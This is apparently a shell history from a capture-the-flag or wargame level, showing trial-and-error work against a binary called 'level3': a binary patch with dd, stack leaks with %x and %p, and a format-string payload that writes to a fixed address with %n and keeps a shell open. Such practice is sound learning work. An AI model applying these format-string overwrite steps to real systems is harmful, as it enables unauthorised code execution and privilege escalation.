    1  ls
    2  python
    3  xxd -s0x4a4 -l118 level3 
    4  objdump -Mintel --disassemble=v level3
    5  objdump -Mintel --disassemble v level3
    6  xxd -s0x4a4 -l118 level3 
    7  xxd -s0x4a4 -l118 level3  | grep "75"
    8  cp level3 /tmp/level3
    9  ls -l /tmp/level3
   10  ls -l level3
   11  cp -p level3 /tmp/level3
   12  ls -l /tmp/level3
   13  ls -l level3
   14  cp --preserve=all level3 /tmp/level3
   15  ls -l /tmp/level3
   16  cp -a level3 /tmp/level3
   17  ls -l /tmp/level3
   18  rsync
   19  rsync -a level3 /tmp/level3
   20  ls -l /tmp/level3
   21  ls -l level3
   22  xxd -s0x4a4 -l118 level3  | grep "75"
   23  printf
   24  printf '\x74'
   25  printf '\x74' | dd of=/tmp/level3 bs=1 seek=0x4e2 count=1 conv=notrunc
   26  python
   27  printf '\x74' | dd of=/tmp/level3 bs=1 seek=4e2 count=1 conv=notrunc
   28  printf '\x74' | dd of=/tmp/level3 bs=1 seek=1250 count=1 conv=notrunc
   29  xxd -s0x4a4 -l118 /tmp/level3  | grep "75"
   30  xxd -s0x4a4 -l118 /tmp/level3  | grep "74"
   31  /tmp/level3
   32  ls
   33  ls -l
   34  vim level3 
   35  man dd
   36  ls -l
   37  rsync -avz level3 /tmp/level3
   38  ls -l /tmp/level3
   39  ls
   40  ls -l
   41  gdb level3 
   42  ./level3
   43  python -c 'print("%x "*80)' | ./level3
   44  python
   45  python -c 'print("%x "*64)' | ./level3
   46  gdb
   47  gdb level3
   48  python -c 'print("%x "*80)' | ./level3
   49  python -c 'print("%p "*80)' | ./level3
   50  python -c 'print("%p "*80)' | ./level3 | grep "0x08048525"
   51  python -c 'print("%p "*120)' | ./level3 | grep "0x08048525"
   52  python -c 'print("%p "*500)' | ./level3 | grep "0x08048525"
   53  python -c 'print("%p "*10000)' | ./level3 | grep "0x08048525"
   54  python -c 'print("%p "*80)' | ./level3 | grep "0x08048525"
   55  python -c 'print("%p "*80)' | ./level3
   56  python -c 'print("%p"*80)' | ./level3
   57  python -c 'print("%p"*80)' | ./level3 | grep "0x08048525"
   58  python -c 'print("%p"*160)' | ./level3 | grep "0x08048525"
   59  python -c 'print("%p"*160)' | ./level3
   60  python -c 'print("%p "*160)' | ./level3
   61  python
   62  python -c 'print("a"*64)' | ./level3
   63  python -c 'print("a"*64 + "%p")' | ./level3
   64  python -c 'print("a"*64 + "%p"*80)' | ./level3
   65  python -c 'print("a"*64 + "%n")' | ./level3
   66  gdb ./level3
   67  python -c 'print("%p"*160)' | ./level3
   68  python -c 'print("%x "*160)' | ./level3
   69  python -c 'print("a"*64 + "%p"*80)' | ./level3
   70  python -c 'print("a"*64 + "%p "*80)' | ./level3
   71  python -c 'print("a"*64 + "%x "*80)' | ./level3
   72  gdb
   73  gdb level3
   74  python -c 'print("\x8c\x98\x04\x08" + "a"*60 + "%x "*80)' | ./level3
   75  python -c 'print("\x8c\x98\x04\x08" + "a"*60 + "%0x "*80)' | ./level3
   76  python -c 'print("\x8c\x98\x04\x08" + "a"*60 + "%x "*80)' | ./level3
   77  python -c 'print("\x8c\x98\x04\x08" + "a"*60 + "%x%x%x")' | ./level3
   78  python -c 'print("\x8c\x98\x04\x08" + "a"*60 + "%x %x %x ")' | ./level3
   79  python -c 'print("\x8c\x98\x04\x08" + "a"*60 + "%x %x %x %x")' | ./level3
   80  python -c 'print("\x8c\x98\x04\x08" + "a"*60 + "%x %x %x %n")' | ./level3
   81  python -c 'print("\x8c\x98\x04\x08" + "a"*60 + "%n %x %x %x")' | ./level3
   82  python -c 'print("\x8c\x98\x04\x08" + "a"*60 + "%x %x %x %n")' | ./level3
   83  python -c 'print("\x8c\x98\x04\x08" + "a"*39 + "%x %x %x %n")' | ./level3
   84  python -c 'print("\x8c\x98\x04\x08" + "a"*39 + "%x %x %x %n")' | ./level3 | wc
   85  python
   86  python -c 'print("\x8c\x98\x04\x08" + "a"*37 + "%x %x %x %n")' | ./level3 | wc
   87  python -c 'print("\x8c\x98\x04\x08" + "a"*37 + "%x %x %x %n")' | ./level3
   88  (python -c 'print("\x8c\x98\x04\x08" + "a"*37 + "%x %x %x %n")'; cat) | ./level3
   89  gdb level3
   90  ls -l
   91  python -c 'print("\x8c\x98\x04\x08" + "a"*37 + "%x %x %x %n")'
   92  python -c 'print("\x8c\x98\x04\x08" + "a"*38 + "%x %x %x %n")' | ./level3
   93  python -c 'print("\x8c\x98\x04\x08" + "a"*41 + "%x%x%x%n")' | ./level3
   94  python -c 'print("\x8c\x98\x04\x08" + "#"*41 + "%x%x%x%n")' | ./level3
   95  (python -c 'print("\x8c\x98\x04\x08" + "#"*41 + "%x%x%x%n")'; cat) | ./level3
   96  ls -l
   97  ls -la
